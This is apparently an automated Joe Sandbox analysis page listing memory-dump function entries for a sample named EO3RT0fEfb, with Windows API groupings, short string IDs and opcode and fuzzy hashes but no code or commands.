                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: BuffCharForegroundUpperWindow
                                                            • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                            • API String ID: 3570115564-1994484594
                                                            • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                            • Instruction ID: e4fa6ab90564acd17c6fcfb958f1129745af3da557b79e5359f2438b496207b5
                                                            • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                            • Instruction Fuzzy Hash: 40717052B18AC3C1EE64BB65F8012FAE2A1AF54784FCD4031D90EA7695EF7DE9458320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                            • API String ID: 3964851224-769500911
                                                            • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                            • Instruction ID: 5791a7103af0a1ffe392ce1e2ad63386f08f60c5f7c21e9c0eb1f58e12a2bd7f
                                                            • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                            • Instruction Fuzzy Hash: 2141AA22F19AD3C1EE906F25A4541B9E292AB54BD4BDC0631CA5E83794EF3DED478320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: #$E$O
                                                            • API String ID: 3215553584-248080428
                                                            • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                            • Instruction ID: 3e6f5d3d9dc2a41bec3e1a443b31970cb5964667ffbc3fc300c2a108e84ff5a1
                                                            • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                            • Instruction Fuzzy Hash: 2E418E22A1AB9585EF51AF61A8405FDA3B1BF54B98F9C4031EE4E07799DF3CE845C320
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                            • String ID: \*.*
                                                            • API String ID: 3196045410-1173974218
                                                            • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                            • Instruction ID: 573c3b2b119423114cbcfb0d40f73e9d0c8c2000ddb791bb78df6878ed1963f8
                                                            • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                            • Instruction Fuzzy Hash: 01414522A186D3D5EF20FB24E9401FDA764FF95788FC84031DA4D53A99EF28D909C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 787153527-1403004172
                                                            • Opcode ID: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                            • Instruction ID: 46bc09bfd5cd7ba7c4ebf03f5961fe337d4e07d4f1884eab4ed85723dea8f2c3
                                                            • Opcode Fuzzy Hash: bcdae5920d2d928eb4967bcf07730aedcb02b36852307e6df1d0eb8a4287a533
                                                            • Instruction Fuzzy Hash: 8E31AC22A096C282EE20FB11F4955E9E360FB85B80F984631DA9D47796DF3CE606C764
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3113390036-3916222277
                                                            • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                            • Instruction ID: f569f7ac5dd36064904a03b2bdd8465ba04a09cacba15e6d5ca1356d0420d2f0
                                                            • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                            • Instruction Fuzzy Hash: 9631A322A1C6C286EF60AF22B451AEAB660FB84BD0F9C5131DA5D57B49DF3CD4028B10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                            • String ID: SysAnimate32
                                                            • API String ID: 4146253029-1011021900
                                                            • Opcode ID: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                            • Instruction ID: 1c9aa72bbe11fea432aef768b52dc187b94b5d409ae605c115b309dbd926cfdc
                                                            • Opcode Fuzzy Hash: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                            • Instruction Fuzzy Hash: BD318D726097C1CBEB60AF25A4447AAB7A1FB85B80F984139DB5A07B84DF3CD441CF20
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                            • Instruction ID: 69b17d3a58448284c3e66f9b24a799fbf1571c7a23b6bcba59ace5e34ae92a58
                                                            • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                            • Instruction Fuzzy Hash: 28F0F421A29AC282EF44AB15F4942B9A7A1EF88790FDC1035EA4F46754DF7CD445C720
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f06d0b1d19ede39c94ed452b1c65b617356a11cb49397c7e380f0e2becba314
                                                            • Instruction ID: f5dbfc666d7f2104f4b6b1b9a305d7508acc839aae3d2d400b995b4b83eeb335
                                                            • Opcode Fuzzy Hash: 2f06d0b1d19ede39c94ed452b1c65b617356a11cb49397c7e380f0e2becba314
                                                            • Instruction Fuzzy Hash: 27A1C462B097C286FF20AB60A6503FAE691AF407B4F9C4635DA5D077C5DF7CE4448322
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                            • String ID:
                                                            • API String ID: 3488606520-0
                                                            • Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                            • Instruction ID: 95f738c058ae2180c73ec43ef762b195a4109926d689bafd64e7072a49877ef7
                                                            • Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                            • Instruction Fuzzy Hash: F4819E22B086D286EF54FF26A4586EDA7A0BB88FD4F894035DE0D67796DF38E401C750
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                            • Instruction ID: 73f721bd7d2d23fd18c383ce6857d08ec6983e33dc67636cffb4692f3f5aa821
                                                            • Opcode Fuzzy Hash: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                            • Instruction Fuzzy Hash: A081BF22E1A6D285FF28BB65A8806FDA6E0BB44B48F884135DD0E176D5DF3CE845C734
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                            • String ID:
                                                            • API String ID: 3659116390-0
                                                            • Opcode ID: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                            • Instruction ID: 365a7b7562940cf7c643334ea4985b3737dd841a5e892a72d8a711da564ef33a
                                                            • Opcode Fuzzy Hash: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                            • Instruction Fuzzy Hash: D151F432A15A9189EB14DF25E4803ECBBB0FB44B98F988135CE4E47798DF38D542C724
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                            • String ID:
                                                            • API String ID: 3740051246-0
                                                            • Opcode ID: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                            • Instruction ID: 6ec1ec5fd7312a7cab599c83d80f89e7b24e7c41f147b411c37fe5a9d3cab4fc
                                                            • Opcode Fuzzy Hash: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
                                                            • Instruction Fuzzy Hash: 4C617E22A08A8286EF10EB65E4943FDBB70FB84784F984135DB4D07AA6DF7CD145CB64
                                                            APIs
                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F1DC2BF), ref: 00007FF75F1DD176
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F1DC2BF), ref: 00007FF75F1DD217
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F1DC2BF), ref: 00007FF75F1DD236
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F1DC2BF), ref: 00007FF75F1DD281
                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F1DC2BF), ref: 00007FF75F1DD2A0
                                                              • Part of subcall function 00007FF75F164120: WideCharToMultiByte.KERNEL32 ref: 00007FF75F164160
                                                              • Part of subcall function 00007FF75F164120: WideCharToMultiByte.KERNEL32 ref: 00007FF75F16419C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                            • String ID:
                                                            • API String ID: 666041331-0
                                                            • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                            • Instruction ID: 955d9874dbb3a2b61314ec6cfe9689f1ad535c8e4711530eb66ca5e307e75c0d
                                                            • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                            • Instruction Fuzzy Hash: 7E512976A14B8685EF50EF56E8941ECB774FB88B84B9A4036DE5E83355EF38D4418320
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                            • Instruction ID: c5e947f445be1b0af708ed442bfea3b5b0f39b81d0e2d26bdddead6c8682d937
                                                            • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                            • Instruction Fuzzy Hash: 16518E22A097C285FF62AF11B6801B9F695EF44BA0F9D4235DE6D0B6D4DF3CE4428721
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String
                                                            • String ID:
                                                            • API String ID: 2832842796-0
                                                            • Opcode ID: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                            • Instruction ID: 6af3d9c8a5b63b8e55573a6f71784b2914a7ebd990e79e7aed35d929b4b69e7a
                                                            • Opcode Fuzzy Hash: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
                                                            • Instruction Fuzzy Hash: 6C510C36A18A8682DF14EF16E4941A9B760FB88FD4B998432EF8E47766DF3CD440C750
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                            • Instruction ID: 77a2fd38cb69273108ab17397333da60067e083026066d5b551898f17077e02a
                                                            • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                            • Instruction Fuzzy Hash: A151F032B086C29BEB58EF31E5481A9B765FB85794F880231EF5A537D5CF38E4518720
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                            • Instruction ID: 82c8444fe8cdd2cba321ac8bf507fcaaf30d9b7cb8e954dcf34d0683c81e620e
                                                            • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                            • Instruction Fuzzy Hash: E5418061B1AA8285EE15EB16B9046F5E391BF48B90F9D4535DD1D8B69DEF3CE8008320
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable
                                                            • String ID:
                                                            • API String ID: 2939132127-0
                                                            • Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                            • Instruction ID: 0e6ca2b1515dedb0408db550afc35ddf79df48701abfac30a9199395d9ba15af
                                                            • Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
                                                            • Instruction Fuzzy Hash: 18510062909BCA81EF51DB25E4546B8B7A0EB85B88F9C4136CB4D476A4CF3EE442D730
                                                            APIs
